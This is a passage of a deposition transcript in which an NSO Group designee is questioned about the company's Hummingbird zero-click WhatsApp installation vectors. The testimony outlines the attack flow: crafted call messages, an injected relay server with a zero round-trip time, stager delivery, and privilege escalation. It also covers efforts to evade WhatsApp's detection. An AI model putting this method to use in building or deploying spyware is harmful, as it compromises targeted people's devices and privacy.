Q   Got it.  And that WhatsApp client on the initiating side would be one that -- an account that NSO created?

A   As part of deployment, each customer has his own set of WhatsApp clients that were used for this operation.

Q   Created by NSO, right?

A   Yes.

Q   Through the White Services team?

A   Yes.

Q   And those would be anonymized as well?

A   Yes, as part of the operation requirements for the customer to be anonymized.

Page 189

Q   Going back to that second bullet, it says:

"As part of the call, initiation handshake between our WIS client and target's WhatsApp."

First of all, do you agree that as part of the call there is an initiation handshake between NSO's WIS client and the target WhatsApp client?

A   Again the question?

Q   Do you agree that as part of the call -- that as part of the call -- it says here as part of the call that there is an initiation handshake between the WIS client and the target client?

A   For operations done by customer deployment was done on customer's infrastructure before initiation is between the code that is deployed on customer side with targets he chooses to install.

Q   Not my question.  But there is a handshake between the WIS and the target client?

A   There is a connection between WIS and WhatsApp client on the target's device.

Q   It says:

48 (Pages 186 - 189)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 190

"As part of the call we add to a specific field (property) of the messages request payload that is named relay servers and usually contains five constant IP addresses of relay servers."

What does that mean?

A   As part of the initiation of the WhatsApp voice call, the data that is transmitted during the voice call is transmitted to relay servers which are designed to transmit data from peer to peer.  What it states, that we had the ability to add specific field to the property and to the payload request sent, which is named relay servers, which usually contains five constant IPs and an additional one.

Q   And so the message, as sent from WIS, would be different than what would have been sent from the WhatsApp client?

A   No, this is not the case.

Q   So what does it mean when it says "It usually contains five and we add an additional relay server"?

A   The relay server at least is received from the server side, the target, target WhatsApp client.  We had the ability to add

Page 191

additional one to that list.

Q   Right.  So you would add it to the message that went to the target client?

A   We had the ability to add that one additional relay server IP to the target.  As it was sent, the target was applied.

Q   In a normal WhatsApp communication, there would only be the five relay servers. Right?

A   Yes.

Q   That is what it means by "usually has five relay servers", right?

A   Yes.

Q   And it continues:

"When a standard WhatsApp client initiates a voice call, it goes out with 5 IP addresses."

And that is what you were referring to, right?

A   Yes.

Q   So the message as sent from WIS was different than what is called here as a standard -- what would come from a standard WhatsApp client, right?

A   A standard WhatsApp client would --

Page 192

as it states here, five IP addresses.

Q   And the message sent from WIS would have six?

A   The message sent from WIS enforces to add additional one.

Q   Sorry, enforces?

A   Yes, enforces to add to that list additional one relay server --

Q   Right, so the message sent by WIS is different.  It has six relay servers instead of five, right?

A   Yes.

Q   What do you mean when you say it enforces to add to this list one additional relay server?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

Q   Is that what you said?  I was not sure I heard you correctly.  Is the word "enforces"?

A   I used the word enforces.  What I was talking about is -- it is read from the written text, the usual at least contains five, and then it says we had the ability to add one additional relay servers list, which is forcing or

Page 193

adding an additional one.

Q   Okay.  It continues:

"WhatsApp servers override the first five servers with their own relay servers."

Do you see that?

A   Yes.

Q   What does that mean?

A   That no matter what is sent from the client, WhatsApp servers are all writing the five -- first five relay server addresses.

Q   And then it says:

"We assign an RTT equals zero value with these servers, leading the target's WhatsApp client to choose our 'relay server' instead of a real one, which serves target client with payloads containing exploitation flow that enable initial code execution."

Do you see that?

A   Yes.

Q   What does it mean when it says "we assign an RTT equals zero value with these servers"?

A   As we said before, normally what is sent from the WhatsApp source, WhatsApp client, the WhatsApp servers are overwriting the list of

49 (Pages 190 - 193)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 194

five first relay server addresses with their list of addresses, and we had a way to direct the target's WhatsApp client code not to use these five -- first five relay server addresses, but use the additional one that we managed to add.

Q   What is RTT?

A   I think it is referring to round trip time.

Q   Round trip time.  So was that causing some aspect of this system to believe that the first five servers are not going to be able to transmit a message efficiently?

A   Yes.

Q   And that is -- I am going to say who, which is obviously not the right word because it is not a person, but who in this chain is selecting the sixth server instead of the first five?

A   The target WhatsApp line.

Q   The target WhatsApp client?

A   Yes.

Q   So when it chooses the sixth, the server that is selected is actually not a relay server, right?

A   Not WhatsApp's relay server.

Page 195

Q   Is it an actual relay server?  I mean is it a relay server?

A   It is a server.  Relay server is just a fancy name for a server.

Q   And is it the server that contains the PE payload?

A   No.

Q   So what server is it that this step we just discussed points to?

A   This is the server that serves as a relay server that transmits data from peer, source peer to the destination peer, and will transmit the voice call data.

Q   So then through that server is WIS transmitting additional data or code to the target WhatsApp client?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

Q   Let me ask it this way.  What is transmitted via that sixth relay server?

A   Additional messages.

Q   From where?

A   Generated, as we said, from the WIS server through the source WhatsApp client it is connected to to transmit the messages to the

Page 196

target WhatsApp client.

Q   Okay.  When it says "It leads the target's WhatsApp client to choose our 'relay' server instead of a real one", that means instead of an actual WhatsApp relay server?

A   Yes.

Q   It says:
"... which serves target's client with payloads containing exploitation flow that enable initial code execution (stager)."
What does that refer to, the payloads containing exploitation flow that enable initial code enable execution?

A   As we talked before, additional messages are sent to -- have to be sent from the source to the destination.  It is not a matter of single message.  As part of these messages, there is additional code, part of the code which is called -- addressed as "stager", which is downloaded using this server, and that part of code will be responsible for downloading the next phase.

Q   Which is the PE?

A   Privilege escalation.

Q   Got it.  And then it says:

Page 197

"After initial code execution, pre-exploit is pulled with a raw TCP socket."
What does that mean?

A   Pre-exploit practically can be addressed as an initial part of the PE, which is a privilege escalation code, which its responsibilities are to detect and send back additional fingerprinting or advanced fingerprinting on the device itself which is required to determine which privilege escalation code to send to the target.

Q   Who would own the relay server, the sixth relay server.

A   This is any part of the infrastructure deployed to the customer's ecosystem, which the customer has its own ecosystem.

Q   Right, but it wouldn't be in the name of the customer, right?

MR. AKROTIRIANAKIS:  Objection, foundation.

A   It depends on the procurement procedures that each customer defines for himself.

Q   Are there instances you are aware of in which the relay server used in the attack would

50 (Pages 194 - 197)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 202

Q   And what purpose does that serve in the installation flow?

MR. AKROTIRIANAKIS:  Objection, assumes facts not in evidence.  Misstates his testimony.  No foundation.

A   So I don't recall for which specific step it was used.

Q   Is that something we would be able to see from the source code?

A   I think so.

Q   And the non-standard encryption that is referred to, again that is a message that is different than what would be sent from a regular WhatsApp client?

A   Again, it really depends on the changes described here.  It can be even the fact that you enable using encryption in the WhatsApp client currently is not supporting the encryption also may be relevant for this case.

Q   Would I have --

A   It is difficult to understand from this context whether it refers to encryption that is the encryption itself is not standard or the usage of encryption was not standard.

Q   Okay.  You are also prepared to

Page 203

testify as to the full functionality of Pegasus, right?

A   Yes, as I said before, I don't recall the specific part which was used.

Q   So we would need the source code for that?

A   Yes.

Q   If I wanted to send a message from my WhatsApp that is encrypted in a non-standard way, can I do that?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A   No.

Q   No, right.  So that is something that was done by WIS?

A   Yes.

Q   The next section down under "WIS client activity", it says:

"Our WIS client does not exactly behave a legitimate subscriber of WhatsApp."

Do you see that?

A   Yes.

Q   And that is an accurate statement, right, that the WIS does not behave exactly like a legitimate subscriber of WhatsApp?

Page 204

A   I would like to continue the sentence, and says that it only sends very specific messages, call messages and text messages, and it refers to the fact that it doesn't send all the other messages which are sent by normal WhatsApp client.

Q   But those are not the only ways in which WIS does not behave exactly like a legitimate WhatsApp client, is it?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A   We are currently referring to the sentence.

Q   But that is not the only way WIS is different from a legitimate subscriber of WhatsApp, right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A   As we said now, WIS server enables you to send crafted messages with crafted content which is required to enable the remote execution ability on the target's phone or WhatsApp client.

Q   I doubt she got a word of that.  Why don't you say it again, see if we can get that down before we go to the next question.

Page 205

A   I was saying that --

Q   Let me repeat the question in case it helps her or you.  I am not sure it is relevant to your answer but let me ask it.  That feature here, that it only sends specific messages, that is not the only way the WIS is different from a legitimate subscriber of WhatsApp, is it?

MR. AKROTIRIANAKIS:  Same objections.

A   So my answer was WIS server implements and enables to craft end messages and content that is required for the installation phase or gaining remote code execution on the target's WhatsApp client.

Q   And those messages are different than the messages that would be sent by a regular WhatsApp subscriber, right?

A   If by "regular" you mean one that holds device in hand, the answer is yes.

Q   It adds a sixth relay server, yes?

A   Yes.

Q   It encrypts the message in a non-standard way, right?

A   Yes.

Q   Are there other ways in which the messages sent by WIS are different from what would

52 (Pages 202 - 205)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 206

be sent by a legitimate WhatsApp subscriber?

A  There are additional messages were sent.  I can't recall whether each and every one is legitimate or not.

Q  You don't remember one way or the other?

A  As you said there are messages which differ in content and in sequence from the legitimate usage, but I cannot say that the illegitimacy is relevant for each and every message which is sent.

Q  The next section down there is sort of a header there that says "Threat Actors Involved".  Do you see that?

A  Yes.

Q  And that refers to parties that might compromise the secrecy of the WhatsApp installation vector?

A  I would have to read it.

Q  Go for it.  Go ahead.

A  Okay.

Q  So "threat actors" there refers to parties that might compromise the operational security of the installation vector.  Is that right?

Page 207

A  As titled maybe, but I don't think the content is relevant for this headline.

Q  So maybe it refers to -- what do you understand "threat actors" to mean, as NSO and Q's corporate representative?

A  Threat actors is as you said, but I said that the content of the paragraph doesn't necessarily address the "threat actors" as the headline states.

Q  But we agree that threat actors means parties that might compromise operational security?

A  Yes.

Q  Meaning parties that might detect and seek to prevent the exploit?

A  Yes.

Q  And one of those is WhatsApp itself, right?

A  Yes.

Q  In fact, there are three identified; first WhatsApp, then WhatsApp anti-spamming model and measures and then target.  Right?

A  Yes.

Q  That is what is identified as threat actors to operational security in this document?

Page 208

A  Yes.

Q  And you understood during your time working on the Hummingbird vectors that WhatsApp would try to shut down the installation vectors if they were detected.  Right?

MR. AKROTIRIANAKIS:  Objection, no foundation.  Incomplete hypothetical.

A  WhatsApp would shut down or close any vulnerability it knew about or exists.

Q  Including the vulnerabilities that were being exploited for the Hummingbird vectors, right?

MR. AKROTIRIANAKIS:  Objection, no foundation.  Incomplete hypothetical.

A  If it discovered it, yes.

Q  And so that discovery by WhatsApp is something that the OpSec team worked to avoid.  Is that right?

A  OpSec team, as I said at the beginning document, are placing new suggestions that from their point of view would like to be implemented.  Whether any suggestion here is implemented or not, it really depends on the capability and whether it can be applied or not.

Q  But my question was more general,

Page 209

not about specific suggestions, that discovery of the exploits by WhatsApp is something that the OpSec team worked to avoid.  Isn't that right?

A  They suggested ways so that the capability would prolong much longer time.

Q  How many members did the OpSec team have in 2018/19?

A  2018, it was one.

Q  What about 2019?

A  Less than 10.

Q  Why did it increase from one to less than 10?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A  The OpSec increased because it needed to address, besides this vector, additional vectors for abilities and infrastructure related analyses, monitoring and investigations.

MR. AKROTIRIANAKIS:  Counsel, whenever you get to a convenient stopping point in the not too distant future --

Q  Sure.  So under the WhatsApp section of actors it says "We know WhatsApp has spam solving measures".  Do you see that?

A  Yes.

53 (Pages 206 - 209)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 210

Q   And what does that refer to, spam solving measures?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A   As it states afterward:  "Users can block people from messaging when something fishy is noticed about them."

Q   And that is your understanding of spam solving measures?

A   As far as I understand it, it talks about the ability WhatsApp added to client to block specific users.

Q   The next section here is "WhatsApp - Anti-spamming Model and Measures".  Do you see that section there?  At the very bottom of the page and the text is on the following.  Do you see that?

A   Yes.

Q   This is a summary of measures that NSO understood WhatsApp took to avoid improper messages being sent?

MR. AKROTIRIANAKIS:  Objection, misstates the document.

A   As I said before, it states suggestions by the person that wrote the report.

Page 211

Q   So when it says "WhatsApp encourages users to report spam", that is a suggestion from the OpSec team?

A   It is essentially what WhatsApp are doing.

Q   Right, but it is not a suggestion from the OpSec team, is it?

A   This specific one sentence, no.

Q   It says:

"This could be demonstrated by the following ways:

Policy.

WhatsApp prompts an immediate 'SPAM or block' option when receiving message, added to group by unidentified number."

That is not a suggestion from the OpSec team, is it?

MR. AKROTIRIANAKIS:  Where are you reading from?

MR. PEREZ-MARQUES:  A, also numbered 1, but the second sub-bullet on page 959.  Also not a suggestion from the OpSec team, right?

A   Right.

Q   The next one, B:

"In case number is reported as spam it

Page 212

is added to a watchlist."

That is not a suggestion from the OpSec team, is it?

A   I was referring to the document as a whole.

Q   Okay.  But what we have in this section here, these are not suggestions from the OpSec team.  These are observations about WhatsApp's anti-spamming measures, correct?

A   Observations, and his understanding of the features.

Q   Understanding of WhatsApp's anti-spamming features, right?

A   Yes.

Q   And the purpose of reciting them here was to formulate a strategy for how those features could be avoided.  Isn't that right?

MR. AKROTIRIANAKIS:  Objection, no foundation.  Misstates the document.

A   I would say these are his understandings how these mechanisms work in order to be taken under consideration during the installation flow implementation.

Q   In order to avoid detection, right?

A   This could be understandings that

Page 213

may even relate to not avoid measures but to even be able to finish and complete the installation flow successfully.

Q   Okay.  Despite WhatsApp's security measures, right?

MR. AKROTIRIANAKIS:  Objection, misstates the document and the testimony.  No foundation.

MR. PEREZ-MARQUES:  Let's take a step back.

The whole purpose -- this is an Operation Security document, right?

MR. AKROTIRIANAKIS:  Objection, misstates the testimony.

A   This is a draft.

Q   Prepared by -- you identified the individual.  A member of the Operation Security team, right?

A   Yes.

Q   And you said the purpose of this is suggestions for operational security, right.  That was your testimony, right?

A   Yes.

Q   Right.  And suggestions for operational security means ways to maintain the

54 (Pages 210 - 213)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 218

themselves on describing such measures.

Q  Could be the source, right?

A  Could be.

Q  Could be but you don't know for sure?

A  No.

Q  So, in terms of what work the OpSec team to understand WhatsApp's anti-spamming measures, you don't know the details of what work was done?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A  You asked whether human resources were used --

Q  You answered that question.  I am asking whether you know the work that was done by the OpSec team to understand WhatsApp's anti-spamming measures?

A  No.

Q  The last item under F -- let me read F first.  It says:

"WhatsApp maintain predetermined metrics to detect a spammer and ban him from using the service.  Some of the metrics are the following."

Do you see what I just read?

Page 219

A  Yes.

Q  And then item 11 in that list is:

"Using third party modified WhatsApp."

Do you see that?

A  Yes.

Q  What does "third party modified WhatsApp" mean?

A  Applications which are created by engineers based on WhatsApp's original application and used in the Android Play Store.

Q  So that would include applications like the WIS?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A  No.

Q  Would WIS be an example of a third party modified WhatsApp?

A  No.

Q  How so?  What is the distinction?

MR. AKROTIRIANAKIS:  Objection.  No foundation.

A  You cannot install WIS server on your Android device.

Q  Why not?

A  It is not an application.

Page 220

Q  What is it?  What would you call it?

A  It is a piece of code which resides on the server side of the customer infrastructure that is able to connect to the source WhatsApp client, the original source WhatsApp client to send messages.

Q  And when it says "WhatsApp explicitly claim against reversing their app", what do you understand that to mean?

A  I understand, according to his understanding, WhatsApp specifically claimed against reversing this app.

Q  What does that mean?

A  I don't know what he meant by this message.

Q  So as NSO and Q's corporate designee, you can't shed any light as to what that means here?

MR. AKROTIRIANAKIS:  I don't think he is designated as to that category, counsel.  It is beyond the scope of the designation.

MR. PEREZ-MARQUES:  I believe it refers to topic 20, 21 and 22.  Go ahead.

MR. AKROTIRIANAKIS:  I don't think you are within those topics.  You can ask the question

Page 221

and I will object, as this is how this goes, and say it has no foundation and exceeds the scope of his designation and we will do the whole litigation thing after that.

Q  As NSO and Q's corporate representative, you cannot shed any light as to what that reference to reversing their app means here?

MR. AKROTIRIANAKIS:  Objection, no foundation.  Beyond the scope of the designation.

A  I cannot define specifically what he meant by stating this in this sentence.

Q  Can you define generally what he meant by stating that?

MR. AKROTIRIANAKIS:  Same objections.

Q  Was it your understanding at the time that you were working on the Hummingbird vectors that WhatsApp prohibited reverse engineering the WhatsApp client?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A  From my understanding, reverse engineering prohibited by WhatsApp is a legal term, which is not under my possibility to define or address.

56 (Pages 218 - 221)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 222

Q  I am just asking for your understanding.  Did you understand when you were working on the Hummingbird vectors that WhatsApp prohibited reverse engineering the WhatsApp client?

A  I didn't read the terms of service.

Q  You didn't read the terms of service?

A  No.

Q  And you made no effort to comply with them?

MR. AKROTIRIANAKIS:  Objection.  No foundation.

A  Terms of service is a legal document, as far as I understand the word.  I am not familiar with it.

Q  You have never read it?

A  No.

Q  Not familiar with it, right?

A  I never read it.

Q  Made no effort to comply with it, in the course of developing the Hummingbird vectors.  Isn't that right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

Page 223

A  As I said before, reverse engineering is a legal term.  I don't have the tools to address legal terms.

Q  That was not my question.  Is it right that in the course of working on the Hummingbird vectors you made no effort to comply with the WhatsApp terms of service?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A  No.

Q  No it is not correct or no you didn't make such effort?

A  It was not under my obligation to do so.

Q  It was not part of your role to try to comply with the terms of service?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A  I will say it this way.  Due to the fact that we were working on company owned devices, activated WhatsApp client on those devices, I was in charge of developing the installation vectors.

Q  And in the course of developing the installation vectors did you make any effort,

Page 224

sitting here under oath, did you make an effort to comply with the WhatsApp terms of service?

A  No.

Q  Sitting here today, do you know one way or the other whether the steps that your team took in developing the Hummingbird vectors violated the terms of service?

MR. AKROTIRIANAKIS:  Objection, calls for a legal conclusion.  No foundation.

A  As I have said before, I don't have the legal tools to answer the question.

Q  And so you have no answer to that question.  You don't know one way or the other?

A  No.

MR. PEREZ-MARQUES:  Why don't we take a short break.

THE VIDEOGRAPHER:  Going off the record. The time is 15:29.  End of media card number four, volume one, of the video deposition of Tamir Gazneli.

(A short break.)

THE VIDEOGRAPHER:  This is the beginning of media card number five, volume one, in the video deposition of Tamir Gazneli.  Going on the record.  The time is 15:53.

Page 225

MR. PEREZ-MARQUES:  Mr. Gazneli, do you understand you are still under oath?

A  Yes.

Q  I would like to continue with Exhibit 2033.  Before I do, you testified earlier about -- I think what you said are some publically available applications called JEB and IDA?

A  I did.

Q  And those were used as part of the development of the Hummingbird vectors?

A  Yes.

Q  And were those JEB and IDA run on the WhatsApp client?

A  No, the software runs on Linux or Windows machines.

Q  So how were they used?

MR. AKROTIRIANAKIS:  Object to the form of the question.

MR. PEREZ-MARQUES:  In connection with the development of the Hummingbird vectors?

A  You just load the target's the client's application code inside this software.

Q  Which application code?

A  The APK files.

Q  For what?

57 (Pages 222 - 225)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 234

compromise the installation flow activity", but continue.

A   And whether it voids or not is a matter of if they were implemented or if it can be implemented in the code or not.

Q   Whether the countermeasures can be implemented?

A   Yes.

Q   Right, but they were suggestions, subject to whether they could be implemented, of how to avoid compromise of the exploit from an operational security perspective, right?

A   I would say no, in a way that in order to avoid security mechanisms, those security mechanisms have to be implemented on the server side, and whether he knows or he does not, practically he is not familiar with the code itself on the WhatsApp server side, and these suggestions are from his understanding and his investigation or reading he done -- he did on how these mitigations or mechanisms are working, so whether avoiding or not is a matter of whether he is told any mechanism needs to be avoided.

Q   So they are suggestions for how to avoid security mechanisms such as the author

Page 235

understood them?

MR. AKROTIRIANAKIS:  Objection, misstates the testimony.

Q   That is your point, right?  He may have been wrong in his understanding of the security mechanisms, correct?

MR. AKROTIRIANAKIS:  Objection, misstates the testimony.

A   The only state he is understanding of the mechanisms first and second there are also parts in here which are not related to mechanisms, security mechanisms at all, but relating to operational security at all.

Q   But do relate to operational security or do not relate to operational security?

A   Relate to operational security regardless of whether avoiding security mechanisms or not.

Q   But you agree that some of these are suggestions for how to avoid WhatsApp's security mechanisms as the author understood those security mechanisms?

MR. AKROTIRIANAKIS:  Objection, misstates testimony.

A   Some of them, if those specific

Page 236

mechanisms were implemented on the server side, may potentially detect unusual activity on the servers.

Q   And these are suggestions for how to avoid such detection, right?

A   I wouldn't say avoid but minimize the risk.

Q   And were certain of these countermeasures implemented?

A   I would have to read through.

Q   Take a moment.  I know it is two pages of countermeasures here, but go ahead.

A   Are you asking about the whole section?

Q   Yes, the countermeasures and mitigations starts on page 8960 and continues on to 961.

A   For now I can address the fingerprint stage if you want and then I can continue.

Q   You can answer just yes or no, were any of the suggested counter measures in the fingerprint section implemented by NSO?

A   For any the answer is yes, but in order to answer exactly which and how many, I

Page 237

would have to read it all.

Q   Fair enough.  So let's drop that. Would you agree, as a general matter, that NSO took steps to minimize the risk of detection by WhatsApp of the Hummingbird vectors?

A   Yes.

Q   If you look at page 961, under "Deployment OpSec Requirements".  Do you see that?

A   Yes.

Q   It says:

"Each WIS WhatsApp client requires credentials extracted from a phone with a whitened SIM."

What does that mean?

A   So as I explained before the WIS server works in a way that it communicates with an activated source WhatsApp -- source WhatsApp client, which activated using a normal SIM card. This is addresses that -- in order to WIS work properly and send messages, it is connected to a client which uses credentials that were extracted from the SIM card.

Q   Right.  Here it doesn't say "connected to a client"?

A   Yes.

60 (Pages 234 - 237)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 238

Q  It just says "using credentials extracted" from such a client, correct?

A  Yes.

Q  And is that an accurate statement of how WIS worked?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A  It is inaccurate description.

Q  It is an accurate or inaccurate?

A  It is inaccurate, yes.

Q  So the WhatsApp work -- the WIS did not require credentials extracted from a phone with a whitened SIM?

A  WIS required but it required connecting to the source WhatsApp client as I said.

Q  And is it right that the Heaven installation vector would use a different credential for the fingerprint stage and the attack stage?

A  Yes.

Q  And that was for operational security purposes?

A  Yes.

Q  And was that also true with respect

Page 239

to Eden?

A  Yes.

Q  And ERISED?

A  Yes.

Q  We are looking at that -- why don't we take a look at this quickly.

(Exhibit 2034 marked for identification.)

This is 2034, and it is another Confluence document labeled "Abuse Prevention" on the Bates starting NSO_WHATSAPP ending 8916.  Do you see that?  I am not going to ask you any questions about the parts that you don't want me to ask you questions about.

MR. AKROTIRIANAKIS:  I'm just going to point out for the record that 2033 and 2034, the document just presented to the witness have been clawed back and replaced with an overlay.  So I am going to ask you again to follow the protective order in respect of the documents that you put --

MR. PEREZ-MARQUES:  Do you have the overlay version I can put to the witness?

MR. AKROTIRIANAKIS:  I can ask for it to be sent but it has been provided days ago to your team.

MR. PEREZ-MARQUES:  Okay.

Page 240

MR. AKROTIRIANAKIS:  So here's my request.  In what the court reporter attaches to the transcript you should not be using documents that have been clawed back.  That would be a violation of the protective order.  So if we can get a different version of this that is from the overlay and mark it and stipulate that that will be the version of Exhibit 2033 and 2034 that is attached to the transcript, then fine, and with respect to these versions your obligations are described in the protective order.

MR. PEREZ-MARQUES:  Let's discuss that when we are off the record.

MR. AKROTIRIANAKIS:  We just discussed it.  There is no further discussion.

MR. PEREZ-MARQUES:  Let's go off the record then.

MR. AKROTIRIANAKIS:  I don't need to go off the record.

MR. PEREZ-MARQUES:  I would like to go off the record.

MR. AKROTIRIANAKIS:  Okay.  If you want to go off the record go ahead.  You have my permission.

MR. PEREZ-MARQUES:  Thank you. I don't

Page 241

need your permission.

MR. AKROTIRIANAKIS:  You do actually. Both counsel have to agree to go off the record, but you have my permission, Tony, so we don't need to fight about it.

MR. PEREZ-MARQUES:  Excellent.  Let's go off the record.

THE VIDEOGRAPHER:  Going off the record. The time is 16:15.

(A short break.)

THE VIDEOGRAPHER:  Back on the record. The time is 16:16.

MR. PEREZ-MARQUES:  We had a discussion off the record about how to deal with these clawback documents which I believe we are agreed on and so we will implement that at the end of today's session.  Exhibit 2034 that I showed you, Mr. Gazneli, is titled "Abuse Prevention".  Do you see that.

A  Yes.

Q  But if you look at the content of this document, it refers to operational security issues.  Isn't that fair?

MR. AKROTIRIANAKIS:  Object to the form of the question.

61 (Pages 238 - 241)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 250

MR. PEREZ-MARQUES: You are also designated on topic 29, defendant's efforts to circumvent the April 2018 WhatsApp update?

MR. AKROTIRIANAKIS: The designation in respect of Exhibit 29 is defendant's efforts to develop new covert lawful intercept technologies during the time period at issue in this case that could be used with respect to Android devices. It is the same designation.

MR. PEREZ-MARQUES: Okay, and so that is a yes, you are designated on that topic?

A  Yes.

Q  And so do you recall in May 2018 the vectors losing their functionality, the Hummingbird vectors?

A  As I said, if you wanted to introduce me the exact change that was done then I can address the question, but as I said, version was released every two weeks, so whether it is relevant to the exploitation or not, things may be changed and need to be addressed, so I cannot recall the exact specific changes that happened on that version.

Q  Is it right to assume that most WhatsApp updates did not compromise the

Page 251

functionality of the vectors?

MR. AKROTIRIANAKIS: Objection, over-broad. Compound.

A  No.

Q  No? Many of them did?

A  Yes.

Q  The majority did?

A  I don't know the exact distribution.

Q  You said it wasn't right to say most didn't compromise the vectors?

A  Most, as my understanding, more than 80%.

Q  Did more than half of the WhatsApp updates --

A  It depends.

Q  -- compromise the vectors?

A  It depends on the vector.

Q  In those instances up to the time period at least of May 2019, when a WhatsApp software update compromised the functionality of the Hummingbird vectors, NSO was able to find a way to restore their functionality. Isn't that right?

A  Yes.

Q  Let's take a look at the next

Page 252

exhibit. One more question on this. Greg Rose asked for how long, any estimates, and DiVittorio says "Smodi doesn't know". Do you know who Smodi is?

A  Smodi is Uri Somorudiniski if I remember right and pronounce right. He was some kind of VP R&D or CTO at that point.

Q  For NSO?

A  Yes.

Q  Okay. Let's do the next one.

(Exhibit 2037 marked for identification.)

This will be 2037, which is a WhatsApp chat between various participants on July 9, 2018. Do you see that?

A  Okay, yes.

Q  The second page includes a message, the third one down, from Yossi Monsingo. Do you see that?

A  Yes.

Q  Do you know who that is?

A  Yes.

Q  Who is that?

A  I don't recall his exact position at that same time but he worked in customer facing or NOC.

Page 253

Q  Like customer support of some kind?

A  Yes.

Q  Not a member of the R&D team?

A  No.

Q  And he writes -- his message includes an update that WhatsApp released a new version two days ago that is not yet supported but probably tomorrow R&D will release a new package. Do you see that?

A  Yes.

Q  And that again reflects NSO updating its installation vectors in response to software updates from WhatsApp?

A  Yes.

Q  And the two or three day timeframe, is that typical of how long it would take the R&D department to update the vectors in response to a WhatsApp update.

MR. AKROTIRIANAKIS: Objection, over-broad.

A  No.

Q  How long would be typical?

A  It depends on the changes.

Q  What would the range be?

A  It may be from one day to half a

64 (Pages 250 - 253)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 254

year.

Q   This was previously marked as Exhibit 2007, which is a WhatsApp message between various participants on December 5, 2018.

A   Yes.

Q   It states in the second message down:

"WhatsApp has made changes in their servers that currently fail all installations and can cause crashes that risk the Hummingbird vector."

Do you see that?

A   Yes.

Q   And do you recall in December 2018 a WhatsApp update that caused all Hummingbird installations to crash?

A   Yes.

Q   What do you recall about that?

A   I recall that that specific change was around our ability to end that specific relay server that we talked about previously, and controlling the target's WhatsApp client to choose that specific relay server for communication.

Q   And the reference here, when it says "can cause crashes that risk the Hummingbird

Page 255

vector", that relates back to what we saw in the OpSec document about crashes potentially generating logs that would be reviewed by WhatsApp?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A   This relates to crashes that after the change may occur on the target's devices.

Q   And the reason they would risk the Hummingbird vector is potentially, among other reasons, because they could be reviewed by WhatsApp, the crash logs?

MR. AKROTIRIANAKIS:  Objection, misstates testimony.

A   They are uploaded to the server of the vendor and whether they review them or not is their decision to make.

Q   It states on the next page, a few lines down, that the team is working on a solution in top priority hoping to provide a solution ASAP. That is signed Oz, Dana and Moran.  Do you know who those are?

A   Yes.

Q   Who are they?

A   Oz was -- which year?

Page 256

Q   December 2018?

A   Let me look back to my years.  Okay. Oz back then was the Director of Android R&D.

Q   Android R&D?

A   Yes.  Moran was product manager and also Dana.  Dana was her team leader.

Q   As a product manager as well?

A   Yes.

Q   For which product?

A   If I remember right, for the entire Pegasus, and Moran was for Android.

Q   So Oz was part of your team?

A   He was my manager.

Q   So you reported to him?

A   Yes.

Q   Did the NSO R&D team in fact work on a solution to restore the Hummingbird vectors after this December 2018 update?

A   Yes.

Q   And was that successful, that effort?

A   That was Eden.

Q   So Heaven was made not operational by the December 2018 update.  Is that right?

A   Yes.

Page 257

Q   And subsequently NSO released Eden?

A   Yes.

Q   If we look at -- I am going to show you another document.  This is 2038.

(Exhibit 2038 marked for identification)

This is a WhatsApp chat on January 15, 2019 among various participants.  In the first message someone named Gilad says in the last line:

"Bottom line, Eden works fine on S3 and can be demonstrated" with a sort of smiley emoticon.  Do you see that?

A   Yes.

Q   What is S3.

A   Sales 3.

Q   What is sales 3?

A   It is an infrastructure for making demonstrations for our services.

Q   And is this the approximate timing of when Eden became ready for use at least for demonstration purposes.

A   For demonstration, yes.

Q   And then when did Eden go live for use by customers?

A   If I remember right, about a month after.

65 (Pages 254 - 257)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 258

Q   So this reflects NSO's fix or response to the problem that was created by the December 2018 update?

A   This is we doing our job to delivering the customers the software they needed.

Q   Right.  So after the December 2018 update, NSO customers couldn't use the 0 click Android installation vectors, right?

A   Right.

Q   And Eden, once it was released, allowed them to do so again, right?

A   Right.

Q   And between Heaven and Eden was there any other -- was there any 0 click Android installation vector in operation?

A   No.

Q   How did Eden differ from Heaven?

A   The main difference was in the installation flow that in Eden we had to use -- the transmission of the data between the source and the target, WhatsApp client, needs to go through WhatsApp server relay servers.

Q   And how was -- I am sorry -- so in Eden --

A   Yes.

Page 259

Q   -- the transmission had to go through WhatsApp relay servers?

A   Yes.

Q   Okay, and that was not the case with respect to Heaven?

A   Right.

Q   Was that the only difference between Heaven and Eden?

A   This is the major difference.

Q   In terms -- do you recall we spent some time earlier today walking through the steps of an installation attack using the Hummingbird vectors.  Do you recall that?

A   Yes.

Q   And does that description we were walking through apply to Eden as well?

A   Except the fact that -- except the part that talked about controlling the relay servers adding one to the list and directing the target WhatsApp client to select a specific one.

Q   And so what did Eden do instead?

A   It just couldn't anymore change the way the target selects the relay servers, therefore it used -- the communication was done through the WhatsApp relay servers in order to

Page 260

deliver the payloads required for the remote code execution part.

Q   Would that be the stager?

